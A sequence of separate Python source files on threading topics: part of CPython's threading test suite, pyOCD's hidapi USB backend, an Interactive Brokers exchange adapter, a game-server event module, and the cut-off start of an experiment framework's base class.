# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
hidapi_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2020 Arm Limited
# Copyright (c) 2021-2022 Chris Reed
# Copyright (c) 2022 Harper Weigle
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import platform
import six
import threading
from .interface import Interface
from .common import (
filter_device_by_usage_page,
generate_device_unique_id,
is_known_cmsis_dap_vid_pid,
)
from ..dap_access_api import DAPAccessIntf
from ....utility.compatibility import to_str_safe
from ....utility.timeout import Timeout
LOG = logging.getLogger(__name__)
TRACE = LOG.getChild("trace")
TRACE.setLevel(logging.CRITICAL)
try:
import hid
except ImportError:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
# OS flags.
_IS_DARWIN = (platform.system() == 'Darwin')
_IS_WINDOWS = (platform.system() == 'Windows')
class HidApiUSB(Interface):
"""@brief CMSIS-DAP USB interface class using hidapi backend."""
isAvailable = IS_AVAILABLE
HIDAPI_MAX_PACKET_COUNT = 30
def __init__(self, dev, info: dict):
super().__init__()
# Vendor page and usage_id = 2
self.vid = info['vendor_id']
self.pid = info['product_id']
self.vendor_name = info['manufacturer_string'] or f"{self.vid:#06x}"
self.product_name = info['product_string'] or f"{self.pid:#06x}"
self.serial_number = info['serial_number'] \
or generate_device_unique_id(self.vid, self.pid, six.ensure_str(info['path']))
self.device_info = info
self.device = dev
self.thread = None
self.read_sem = threading.Semaphore(0)
self.closed_event = threading.Event()
self.received_data = collections.deque()
def set_packet_count(self, count):
# hidapi for macos has an arbitrary limit on the number of packets it will queue for reading.
# Even though we have a read thread, it doesn't hurt to limit the packet count since the limit
# is fairly high.
if _IS_DARWIN:
count = min(count, self.HIDAPI_MAX_PACKET_COUNT)
self.packet_count = count
def open(self):
try:
self.device.open_path(self.device_info['path'])
except IOError as exc:
raise DAPAccessIntf.DeviceError("Unable to open device: " + str(exc)) from exc
# Windows does not use the receive thread because it causes packet corruption for some reason.
if not _IS_WINDOWS:
# Make certain the closed event is clear.
self.closed_event.clear()
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed_event.is_set():
self.read_sem.acquire()
if not self.closed_event.is_set():
read_data = self.device.read(self.packet_size)
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB IN < (%d) %s", len(read_data), ' '.join([f'{i:02x}' for i in bytes(read_data).rstrip(b'\x00')]))
self.received_data.append(read_data)
finally:
# Set last element of rcv_data to None on exit
self.received_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""@brief Returns all the connected devices with CMSIS-DAP in the name.
returns an array of HidApiUSB (Interface) objects
"""
devices = hid.enumerate()
boards = []
for deviceInfo in devices:
product_name = to_str_safe(deviceInfo['product_string'])
known_cmsis_dap = is_known_cmsis_dap_vid_pid(deviceInfo['vendor_id'], deviceInfo['product_id'])
if ("CMSIS-DAP" not in product_name) and (not known_cmsis_dap):
# Check the device path as a backup. Even though we can't get the interface name from
# hidapi, it may appear in the path. At least, it does on macOS.
device_path = to_str_safe(deviceInfo['path'])
if "CMSIS-DAP" not in device_path:
# Skip non cmsis-dap devices
continue
vid = deviceInfo['vendor_id']
pid = deviceInfo['product_id']
# Perform device-specific filtering.
if filter_device_by_usage_page(vid, pid, deviceInfo['usage_page']):
continue
try:
dev = hid.device(vendor_id=vid, product_id=pid, path=deviceInfo['path'])
except IOError as exc:
LOG.debug("Failed to open USB device: %s", exc)
continue
# Create the USB interface object for this device.
new_board = HidApiUSB(dev, deviceInfo)
boards.append(new_board)
return boards
def write(self, data):
"""@brief Write data on the OUT endpoint associated to the HID interface"""
if TRACE.isEnabledFor(logging.DEBUG):
TRACE.debug(" USB OUT> (%d) %s", len(data), ' '.join([f'{i:02x}' for i in data]))
data.extend([0] * (self.packet_size - len(data)))
if not _IS_WINDOWS:
self.read_sem.release()
self.device.write([0] + data)
def read(self):
"""@brief Read data on the IN endpoint associated to the HID interface"""
# Windows doesn't use the read thread, so read directly.
if _IS_WINDOWS:
read_data = self.device.read(self.packet_size)
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB IN < (%d) %s", len(read_data), ' '.join([f'{i:02x}' for i in bytes(read_data).rstrip(b'\x00')]))
return read_data
# Other OSes use the read thread, so we check for and pull data from the queue.
# Spin for a while if there's not data available yet. 100 µs sleep between checks.
with Timeout(self.DEFAULT_USB_TIMEOUT_S, sleeptime=0.0001) as t_o:
while t_o.check():
if len(self.received_data) != 0:
break
else:
raise DAPAccessIntf.DeviceError(f"Timeout reading from device {self.serial_number}")
if self.received_data[0] is None:
raise DAPAccessIntf.DeviceError(f"Device {self.serial_number} read thread exited")
# Trace when the higher layer actually gets a packet previously read.
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB RD < (%d) %s", len(self.received_data[0]),
' '.join([f'{i:02x}' for i in bytes(self.received_data[0]).rstrip(b'\x00')]))
return self.received_data.popleft()
def close(self):
"""@brief Close the interface"""
assert not self.closed_event.is_set()
LOG.debug("closing interface")
if not _IS_WINDOWS:
self.closed_event.set()
self.read_sem.release()
self.thread.join()
self.thread = None
# Clear closed event, recreate read sem and receiveed data deque so they
# are cleared and ready if we're re-opened.
self.closed_event.clear()
self.read_sem = threading.Semaphore(0)
self.received_data = collections.deque()
self.device.close()
|
ib.py
|
import asyncio
import threading
from queue import Queue
from random import randint
from ibapi.client import EClient # type: ignore
from ibapi.wrapper import EWrapper # type: ignore
from ibapi.order import Order # type: ignore
from aat.exchange import Exchange
from aat.config import EventType, TradingType
from aat.core import ExchangeType, Event, Trade
from .utils import _constructContract, _constructContractAndOrder, _constructInstrument
class _API(EWrapper, EClient):
def __init__(self, order_event_queue, market_data_queue, contract_info_queue):
EClient.__init__(self, self)
self.nextOrderId = None
self.nextReqId = 1
self._order_event_queue = order_event_queue
self._market_data_queue = market_data_queue
self._contract_info_queue = contract_info_queue
def nextValidId(self, orderId: int):
super().nextValidId(orderId)
self.nextOrderId = orderId
def reqContractDetails(self, contract):
super().reqContractDetails(self.nextReqId, contract)
self.nextReqId += 1
def placeOrder(self, contract, order):
super().placeOrder(self.nextOrderId, contract, order)
self.nextOrderId += 1
return self.nextOrderId - 1
def contractDetails(self, reqId, contractDetails):
self._contract_info_queue.put(contractDetails)
def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPrice):
self._order_event_queue.put(dict(orderId=orderId,
status=status,
filled=filled,
remaining=remaining,
avgFillPrice=avgFillPrice,
permId=permId,
parentId=parentId,
lastFillPrice=lastFillPrice,
clientId=clientId,
whyHeld=whyHeld,
mktCapPrice=mktCapPrice))
class InteractiveBrokersExchange(Exchange):
'''Interactive Brokers Exchange'''
def __init__(self, trading_type, verbose, **kwargs):
self._trading_type = trading_type
self._verbose = verbose
if self._trading_type == TradingType.LIVE:
super().__init__(ExchangeType('interactivebrokers'))
else:
super().__init__(ExchangeType('interactivebrokerspaper'))
# map order.id to order
self._orders = {}
# IB TWS gateway
self._order_event_queue = Queue()
self._market_data_queue = Queue()
self._contract_lookup_queue = Queue()
self._api = _API(self._order_event_queue, self._market_data_queue, self._contract_lookup_queue)
# *************** #
# General methods #
# *************** #
async def instruments(self):
'''get list of available instruments'''
return []
async def connect(self):
'''connect to exchange. should be asynchronous.
For OrderEntry-only, can just return None
'''
if self._trading_type == TradingType.LIVE:
self._api.connect('127.0.0.1', 7496, randint(0, 10000))
raise NotImplementedError()
else:
self._api.connect('127.0.0.1', 7497, randint(0, 10000))
self._api_thread = threading.Thread(target=self._api.run, daemon=True)
self._api_thread.start()
while self._api.nextOrderId is None:
print('waiting for IB connect...')
await asyncio.sleep(1)
print('IB connected!')
async def lookup(self, instrument):
self._api.reqContractDetails(_constructContract(instrument))
i = 0
while i < 5:
if self._contract_lookup_queue.qsize() > 0:
ret = []
while self._contract_lookup_queue.qsize() > 0:
contract_details = self._contract_lookup_queue.get()
ret.append(_constructInstrument(contract_details.contract))
return ret
else:
await asyncio.sleep(1)
i += 1
# ******************* #
# Market Data Methods #
# ******************* #
async def tick(self):
'''return data from exchange'''
while True:
# clear order events
while self._order_event_queue.qsize() > 0:
order_data = self._order_event_queue.get()
status = order_data['status']
order = self._orders[order_data['orderId']]
if status in ('ApiPending', 'PendingSubmit', 'PendingCancel', 'PreSubmitted', 'ApiCancelled', 'Inactive'):
# ignore
continue
elif status in ('Submitted',):
# TODO more granular order events api?
# ignore
pass
elif status in ('Cancelled',):
e = Event(type=EventType.REJECTED, target=order)
yield e
elif status in ('Filled',):
t = Trade(volume=order_data['filled'], price=order_data['avgFillPrice'], maker_orders=[], taker_order=order)
t.my_order = order
e = Event(type=EventType.TRADE, target=t)
yield e
await asyncio.sleep(0)
# clear market data events
# TODO
# ******************* #
# Order Entry Methods #
# ******************* #
async def accounts(self):
'''get accounts from source'''
return []
async def newOrder(self, order):
'''submit a new order to the exchange. should set the given order's `id` field to exchange-assigned id
For MarketData-only, can just return None
'''
# construct IB contract and order
ibcontract, iborder = _constructContractAndOrder(order)
# send to IB
id = self._api.placeOrder(ibcontract, iborder)
# update order id
order.id = id
self._orders[order.id] = order
async def cancelOrder(self, order: Order):
'''cancel a previously submitted order to the exchange.
For MarketData-only, can just return None
'''
self._api.cancelOrder(order.id)
Exchange.registerExchange('ib', InteractiveBrokersExchange)
|
event.py
|
import time
import threading
from modules.base_module import Module
class_name = "Event"
class Event(Module):
prefix = "ev"
def __init__(self, server):
self.server = server
self.commands = {"get": self.get_events, "gse": self.get_self_event,
"crt": self.create_event,
"cse": self.close_self_event,
"evi": self.get_event_info}
self.events = {}
thread = threading.Thread(target=self._background)
thread.daemon = True
thread.start()
def get_events(self, msg, client):
evts = []
for uid in self.events:
apprnc = self.server.get_appearance(uid)
if not apprnc:
continue
evts.append(self._get_event(uid))
client.send(["ev.get", {"c": -1, "tg": "", "evlst": evts}])
def get_self_event(self, msg, client):
if client.uid not in self.events:
return client.send(["ev.gse", {}])
event = self.events[client.uid]
client.send(["ev.gse", {"ev": self._get_event(event, client.uid)}])
def create_event(self, msg, client):
if client.uid in self.events:
return
ev = msg[2]["ev"]
duration = int(msg[2]["evdrid"].split("eventDuration")[1])
if ev["r"] > 13 or ev["c"] == 3:
user_data = self.server.get_user_data(client.uid)
privileges = self.server.modules["cp"].privileges
if user_data["role"] < privileges["CREATE_MODERATOR_EVENT"]:
return
event = {"name": ev["tt"], "description": ev["ds"],
"start": int(time.time()), "uid": client.uid,
"finish": int(time.time()+duration*60),
"min_lvl": ev["ml"], "category": ev["c"], "active": ev["ac"],
"rating": ev["r"]}
if not ev["l"]:
event["location"] = "livingroom"
else:
event["location"] = ev["l"]
self.events[client.uid] = event
user_data = self.server.get_user_data(client.uid)
client.send(["ev.crt", {"ev": self._get_event(client.uid),
"res": {"gld": user_data["gld"],
"slvr": user_data["slvr"],
"enrg": user_data["enrg"],
"emd": user_data["emd"]},
"evtg": []}])
def close_self_event(self, msg, client):
if client.uid not in self.events:
return
del self.events[client.uid]
client.send(["ev.cse", {}])
def get_event_info(self, msg, client):
id_ = str(msg[2]["id"])
if id_ not in self.events:
return
event = self._get_event(id_)
apprnc = self.server.get_appearance(id_)
clths = self.server.get_clothes(id_, type_=2)
client.send(["ev.evi", {"ev": event,
"plr": {"uid": id_, "apprnc": apprnc,
"clths": clths},
"id": int(id_)}])
def _get_event(self, uid):
event = self.events[uid]
apprnc = self.server.get_appearance(uid)
type_ = 0 if event["location"] == "livingroom" else 1
return {"tt": event["name"], "ds": event["description"],
"st": event["start"], "ft": event["finish"], "uid": uid,
"l": event["location"], "id": int(uid), "unm": apprnc["n"],
"ac": event["active"], "c": event["category"],
"ci": 0, "fo": False, "r": event["rating"], "lg": 30,
"tp": type_, "ml": event["min_lvl"]}
def _background(self):
while True:
for uid in self.events.copy():
if time.time() - self.events[uid]["finish"] > 0:
del self.events[uid]
time.sleep(60)
|
_base.py
|
# Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import annotations
import abc
import concurrent.futures
import copy as cp
import datetime
import enum
import json
import os
import tarfile
import threading
import traceback
import typing as t
from functools import partial
from pathlib import Path
from time import sleep
import numpy as np
import toml
from exot.channel import Channel
from exot.driver import Driver, DriverFactory
from exot.exceptions import *
from exot.layer import LayerFactory
from exot.util.android import Intent
from exot.util.attributedict import AttributeDict
from exot.util.file import (
add_random,
add_timestamp,
backup as file_backup,
copy,
delete,
move,
move_action,
validate_root_path,
)
from exot.util.git import GitRepository
from exot.util.logging import Loggable, get_root_logger
from exot.util.misc import (
call_with_leaves,
dict_depth,
dict_diff,
get_valid_access_paths,
getitem,
isabstract,
leaves,
map_to_leaves,
setitem,
validate_helper,
)
from exot.util.mixins import (
Configurable,
HasParent,
IntermediatesHandler,
Pickleable,
SubclassTracker,
)
from exot.util.prompts import prompt
from exot.util.timeout import Timeout
from exot.util.wrangle import (
app_configfile_formatter,
app_log_formatter,
generic_log_formatter,
log_path_unformatter,
repetition_formatter,
run_path_formatter,
run_path_unformatter,
)
__all__ = ("Experiment", "Run")
"""
Experiment
----------
Base class for experiments. Responsible for:
- configuration parsing and validation,
- bootstrapping data processing layers, drivers, and channels,
- finding and validating environments,
- writing and reading serialised experiments,
- backing up the experiment.
Synopsis & signatures::
__init_subclass__ (*args, **kwargs) -> None
_create_drivers (self) -> 't.Mapping'
_get_environments (self, _ignore: 't.Optional[str]' = None)
_validate_environment (env: 't.Mapping') -> 't.NoReturn'
_validate_execute (self, env : str) -> 't.NoReturn'
backup (self, _with_logs: 'bool' = False, _with_results: 'bool' = False) -> 'None'
bootstrap (self) -> 'None'
bootstrap_logger (self, custom_filename: Union[str, NoneType] = None) -> None
configure_layers (self, **kwargs: 't.Any') -> 'None'
deserialise (source=typing.Union[str, bytes, pathlib.Path, typing.IO]) -> object
dump (self, file: io.IOBase) -> None
dumps (self) -> Union[str, bytes]
execute (self) -> 'None'
generate (self) -> 'None'
load (source: io.IOBase) -> object
loads (source: Union[str, bytes]) -> object
read (path: 'Path') -> 'Experiment'
required_config_keys () -> 'list'
required_layers () -> 'list'
serialise (self, file: Union[pathlib.Path, IO, NoneType] = None) -> Union[str, NoneType]
validate (self) -> 'None'
write (self) -> 'None'
"""
class Experiment(
SubclassTracker,
Pickleable,
Configurable,
Loggable,
track="type",
serialise_stub=["_phases"],
metaclass=abc.ABCMeta,
):
@enum.unique
class Type(enum.IntEnum):
"""Experiment types"""
FrequencySweep = enum.auto()
Exploratory = enum.auto()
Performance = enum.auto()
RealWorld = enum.auto()
AppExec = enum.auto()
def __init_subclass__(cls, *args, **kwargs) -> None:
super().__init_subclass__(*args, **kwargs)
@property
def _config_general_standard(self):
return "STANDARD"
@property
def config(self):
if hasattr(self, "_config"):
setting_key = self._config_general_standard
if hasattr(self.layers, "io"):
if self.layers["io"].configured:
if "env" in self.layers["io"].config:
setting_key = self.layers["io"].config["env"]
